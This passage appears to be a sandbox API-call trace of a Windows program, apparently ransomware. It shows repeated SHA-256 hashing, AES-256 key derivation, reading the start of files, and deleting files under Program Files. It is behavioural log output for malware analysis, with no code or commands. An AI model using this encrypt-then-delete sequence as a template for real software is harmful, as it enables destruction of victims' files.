[0185.362] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.362] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f4b [0185.362] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.377] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.377] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.377] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.379] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.png")) returned 0 [0185.380] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.381] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.381] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.381] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.381] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc38 [0185.381] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.383] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.383] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.383] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.385] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color32.bmp")) returned 0 [0185.387] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.388] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.388] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.388] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.388] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24cd [0185.388] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.392] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.392] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.392] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.394] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color32.jpg")) returned 0 [0185.395] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.396] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.396] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.396] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.396] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b38 [0185.396] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.406] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.406] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.406] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.408] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.bmp")) returned 0 [0185.409] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.410] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.410] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.410] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.410] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2c85 [0185.410] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.450] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.451] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.451] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.453] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.jpg")) returned 0 [0185.454] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.455] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.455] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.455] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.455] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1532 [0185.455] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.460] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.460] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.460] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.462] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.png")) returned 0 [0185.467] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.468] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.468] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.468] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.468] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.469] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.469] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.470] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0185.471] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.471] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.471] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.471] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f54 [0185.471] ReadFile (in: hFile=0x584, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.477] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.477] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.477] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0185.478] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceamharic.txt")) returned 0 [0185.480] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0185.481] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.481] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.481] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.481] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x136bf6 [0185.481] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.612] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.612] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.612] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0185.613] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicearray.txt")) returned 0 [0185.614] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0185.614] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.614] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.614] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.614] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef486 [0185.614] ReadFile (in: hFile=0x584, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.685] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.685] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.685] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0185.687] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicedayi.txt")) returned 0 [0185.688] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0185.688] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.688] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.688] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.688] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x196b56 [0185.688] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.803] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.803] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.803] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0185.805] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt")) returned 0 [0185.806] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0185.807] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.807] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.807] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.807] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x160e36 [0185.807] ReadFile (in: hFile=0x584, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.906] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.906] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.906] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0185.907] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt")) returned 0 [0185.909] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0185.909] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.909] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.909] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.909] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b9fb0 [0185.909] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0186.037] CryptDestroyHash (hHash=0x284d628) returned 1 [0186.037] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.037] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.040] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt")) returned 0 [0186.041] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0186.042] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0186.042] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.042] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0186.042] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xafa8 [0186.042] ReadFile (in: hFile=0x584, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0186.058] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.058] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.058] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.060] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceyi.txt")) returned 0 [0186.061] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.061] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.061] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.062] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.062] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.064] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.064] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.067] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0186.067] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0186.067] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.067] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0186.067] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a74 [0186.068] ReadFile (in: hFile=0x584, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0186.093] CryptDestroyHash (hHash=0x284d568) returned 1 [0186.093] CryptDestroyKey (hKey=0x284d528) returned 1 [0186.093] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.094] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\drag.png")) returned 0 [0186.095] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.096] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.096] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.096] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.096] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.096] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4a9e [0186.096] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.115] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.115] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.115] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.125] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html")) returned 0 [0186.125] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.127] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0186.128] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0186.128] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.128] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0186.128] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12f0 [0186.128] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0186.132] CryptDestroyHash (hHash=0x284d568) returned 1 [0186.132] CryptDestroyKey (hKey=0x284d528) returned 1 [0186.132] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.133] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css")) returned 0 [0186.134] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.134] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.134] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.134] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0186.135] GetFileSize (in: hFile=0x58c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f2 [0186.135] ReadFile (in: hFile=0x58c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.151] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.151] CryptDestroyKey (hKey=0x284d668) returned 1 [0186.151] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.153] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml")) returned 0 [0186.155] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.156] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0186.157] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0186.157] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.157] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0186.157] GetFileSize (in: hFile=0x58c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xff08 [0186.157] ReadFile (in: hFile=0x58c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0186.175] CryptDestroyHash (hHash=0x284d668) returned 1 [0186.175] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0186.175] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.177] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js")) returned 0 [0186.178] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0186.179] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0186.179] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.179] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0186.179] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd13 [0186.179] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 